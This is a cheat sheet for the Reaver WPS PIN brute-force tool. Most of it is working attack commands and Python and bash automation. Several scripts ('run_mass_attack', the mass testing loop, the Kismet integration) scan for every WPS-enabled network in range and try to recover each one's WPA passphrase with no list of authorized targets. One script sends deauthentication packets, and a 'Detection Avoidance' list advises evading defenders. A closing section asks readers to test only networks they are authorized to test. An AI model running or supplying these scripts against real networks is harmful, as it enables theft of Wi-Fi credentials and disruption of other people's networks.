Appearance
Reaver Cheat Sheet
Overview
Reaver is a specialized wireless security tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) implementations to recover WPA/WPA2 passphrases. Developed by Craig Heffner, Reaver implements a brute force attack against WPS PIN authentication, taking advantage of a critical design flaw in the WPS protocol that allows attackers to recover the PIN in significantly fewer attempts than the theoretical maximum. This vulnerability, known as the WPS PIN attack, affects millions of wireless routers and access points worldwide.
The fundamental weakness that Reaver exploits lies in how WPS validates PIN authentication. Instead of validating the entire 8-digit PIN as a single unit, WPS validates the PIN in two separate halves, effectively reducing the search space from 10^8 possible combinations to approximately 11,000 attempts. This design flaw, combined with the fact that most WPS implementations do not implement proper rate limiting or lockout mechanisms, makes it possible to recover WPS PINs and subsequently the WPA/WPA2 passphrase in a matter of hours.
Reaver has become an essential tool for wireless security assessments and penetration testing, demonstrating the inherent security weaknesses in WPS implementations. The tool's effectiveness has led to widespread awareness of WPS vulnerabilities and has influenced many organizations to disable WPS functionality on their wireless infrastructure. Despite countermeasures implemented by some manufacturers, Reaver remains relevant for testing legacy systems and identifying vulnerable wireless networks during security assessments.
Installation
Package Manager Installation
Installing Reaver through system package managers:
bash
# Ubuntu/Debian installation
sudo apt update
sudo apt install reaver
# Kali Linux (pre-installed)
reaver --help
# CentOS/RHEL installation
sudo yum install epel-release
sudo yum install reaver
# Arch Linux installation
sudo pacman -S reaver
# Verify installation
reaver --version
which reaverSource Compilation
Compiling Reaver from source code:
bash
# Install dependencies
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
# Clone repository
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
cd reaver-wps-fork-t6x
# Navigate to source directory
cd src
# Configure and compile
./configure
make
# Install system-wide
sudo make install
# Verify installation
reaver --versionDocker Installation
bash
# Create Dockerfile for Reaver
cat > Dockerfile << 'EOF'
FROM kalilinux/kali-rolling
RUN apt-get update && apt-get install -y reaver aircrack-ng
WORKDIR /workspace
CMD ["/bin/bash"]
EOF
# Build container
docker build -t reaver-toolkit .
# Run with network access
docker run -it --net=host --privileged reaver-toolkit
# Mount workspace
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkitBasic Usage
Target Discovery
Discovering WPS-enabled access points:
bash
# Put wireless interface in monitor mode
sudo airmon-ng start wlan0
# Scan for WPS-enabled networks
wash -i wlan0mon
# Detailed WPS scan
wash -i wlan0mon -C
# Scan specific channel
wash -i wlan0mon -c 6
# Save scan results
wash -i wlan0mon -o wps_targets.txt
# Show only networks with WPS enabled
wash -i wlan0mon | grep "Yes"Basic WPS Attack
Performing basic WPS PIN brute force attack:
bash
# Basic Reaver attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Attack with specific channel
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
# Attack with delay between attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
# Attack with session file
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
# Resume previous session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vvAdvanced Attack Options
Advanced Reaver attack configurations:
bash
# Ignore lock warnings
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# No NACKS (for some routers)
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
# Disable associated requests
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
# Use small DH keys
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
# Specify timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vvAdvanced Features
PIN Management
Managing WPS PIN attempts and recovery:
bash
# Start from specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
# Use PIN from file
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
# Generate PIN list
crunch 8 8 0123456789 > pin_list.txt
# Check specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
# Show current PIN attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv | grep "Trying pin"Session Management
Managing Reaver attack sessions:
bash
# Create named session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
# List existing sessions
ls ~/.reaver/
# View session details
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
# Delete session
rm ~/.reaver/target1.wpc
# Backup session
cp ~/.reaver/target1.wpc target1_backup.wpcRate Limiting and Timing
Controlling attack timing and rate limiting:
bash
# Delay between PIN attempts (seconds)
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
# Delay after 10 failures
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
# Maximum number of attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
# Timeout for each attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
# Recurring delay pattern
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vvPixie Dust Attack
Implementing Pixie Dust (offline) attack:
bash
# Enable Pixie Dust attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
# Pixie Dust with specific parameters
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
# Save Pixie Dust data
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
# Use external Pixie Dust tool
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
# Automated Pixie Dust with OneShot
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -KAutomation Scripts
Mass WPS Testing
bash
#!/bin/bash
# Mass WPS testing script
INTERFACE="wlan0mon"
RESULTS_DIR="reaver_results"
DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
# Discover WPS targets
echo "Discovering WPS-enabled targets..."
wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
# Extract target information
grep "Yes" $RESULTS_DIR/wps_targets.txt | while read line; do
BSSID=$(echo $line | awk '{print $1}')
CHANNEL=$(echo $line | awk '{print $2}')
ESSID=$(echo $line | awk '{print $6}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_${BSSID//:/_}.log"
SESSION_FILE="$RESULTS_DIR/session_${BSSID//:/_}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_${BSSID//:/_}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results."Automated PIN Recovery
python
#!/usr/bin/env python3
# Automated WPS PIN recovery script
import subprocess
import re
import time
import json
from datetime import datetime
class ReaverAutomation:
def __init__(self, interface):
self.interface = interface
self.results = {}
self.active_attacks = {}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = {
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: {e}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return {
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
}
else:
return {'success': False, 'method': 'pixie_dust'}
except subprocess.TimeoutExpired:
return {'success': False, 'method': 'pixie_dust', 'error': 'timeout'}
except Exception as e:
return {'success': False, 'method': 'pixie_dust', 'error': str(e)}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_{target['bssid'].replace(':', '_')}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return {'success': False, 'method': 'brute_force', 'error': 'timeout'}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return {
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for {target['bssid']}")
time.sleep(60) # Wait before continuing
process.terminate()
return {'success': False, 'method': 'brute_force'}
except Exception as e:
return {'success': False, 'method': 'brute_force', 'error': str(e)}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking {target['essid']} ({target['bssid']})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for {target['bssid']}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for {target['bssid']}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for {target['bssid']}")
else:
print(f"FAILED: All attacks failed for {target['bssid']}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found {len(targets)} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = {
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: {report['successful_attacks']}/{report['total_targets']}")
# Usage
if __name__ == "__main__":
automation = ReaverAutomation("wlan0mon")
automation.run_mass_attack()WPS Vulnerability Scanner
python
#!/usr/bin/env python3
# WPS vulnerability scanner
import subprocess
import re
import csv
from datetime import datetime
class WPSScanner:
def __init__(self, interface):
self.interface = interface
self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = {
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: {e}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = {
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found {len(networks)} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found {len(wps_networks)} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: {critical}")
print(f"High: {high}")
print(f"Medium: {medium}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
# Usage
if __name__ == "__main__":
scanner = WPSScanner("wlan0mon")
scanner.run_assessment()Integration Examples
Aircrack-ng Integration
bash
#!/bin/bash
# Reaver and Aircrack-ng integration
INTERFACE="wlan0mon"
TARGET_BSSID="00:11:22:33:44:55"
TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
# Start airodump-ng to capture handshakes
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID $INTERFACE &
AIRODUMP_PID=$!
# Start Reaver attack
reaver -i $INTERFACE -b $TARGET_BSSID -c $TARGET_CHANNEL -vv &
REAVER_PID=$!
# Monitor for successful WPS crack
while kill -0 $REAVER_PID 2>/dev/null; do
if grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS PIN recovered!"
kill $REAVER_PID
break
fi
sleep 10
done
# If WPS failed, try WPA handshake capture
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed"Kismet Integration
python
#!/usr/bin/env python3
# Reaver and Kismet integration
import subprocess
import json
import time
class ReaverKismetIntegration:
def __init__(self, kismet_server="localhost:2501"):
self.kismet_server = kismet_server
self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://{self.kismet_server}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append({
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', {}).get('kismet.common.signal.last_signal', 0)
})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: {e}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return {
'success': True,
'method': 'pixie_dust',
'output': result.stdout
}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return {
'success': True,
'method': 'brute_force',
'output': result.stdout
}
else:
return {'success': False, 'output': result.stdout}
except subprocess.TimeoutExpired:
return {'success': False, 'error': 'timeout'}
except Exception as e:
return {'success': False, 'error': str(e)}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found {len(devices)} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking {len(targets)} prioritized targets")
for target in targets:
print(f"Attacking {target['ssid']} ({target['bssid']})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: {target['ssid']} cracked via {result['method']}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"{time.ctime()}: {target['ssid']} ({target['bssid']}) - {result['method']}\n")
else:
print(f"FAILED: {target['ssid']} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
# Usage
if __name__ == "__main__":
integration = ReaverKismetIntegration()
integration.run_integrated_attack("wlan0mon")Troubleshooting
Common Issues
Interface Problems:
bash
# Check wireless interface
iwconfig
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Check monitor mode interface
iwconfig wlan0mon
# Kill conflicting processes
sudo airmon-ng check kill
# Restart network manager
sudo systemctl restart NetworkManagerWPS Lock Issues:
bash
# Check if WPS is locked
wash -i wlan0mon | grep "Yes.*Yes"
# Wait for lock timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# Use longer delays
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 60 -vv
# Try different attack methods
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -A -vvAssociation Problems:
bash
# Check signal strength
wash -i wlan0mon | grep BSSID
# Move closer to target
# Increase transmission power (if legal)
sudo iwconfig wlan0mon txpower 20
# Use external antenna
# Check for interference
airodump-ng wlan0monDebugging
Enable detailed debugging and logging:
bash
# Maximum verbosity
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Log to file
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1 | tee reaver.log
# Monitor system logs
tail -f /var/log/syslog | grep reaver
# Check wireless driver logs
dmesg | grep -i wireless
# Monitor network traffic
tcpdump -i wlan0mon -w reaver_traffic.pcapSecurity Considerations
Legal and Ethical Considerations
Authorized Testing Only:
- Only test networks you own or have explicit permission to test
- Obtain written authorization before conducting WPS attacks
- Follow local laws and regulations regarding wireless security testing
- Respect privacy and confidentiality of network traffic
- Document all testing activities for compliance
Responsible Disclosure:
- Report vulnerabilities to network owners
- Provide remediation guidance
- Allow reasonable time for fixes
- Follow coordinated disclosure practices
- Maintain confidentiality during disclosure process
Operational Security
Detection Avoidance:
- Use appropriate delays between attempts
- Monitor for defensive responses
- Avoid peak usage hours
- Use directional antennas when possible
- Implement proper operational security measures
Network Impact:
- Minimize disruption to legitimate users
- Avoid excessive deauthentication attacks
- Monitor network performance impact
- Use appropriate power levels
- Respect network availability requirements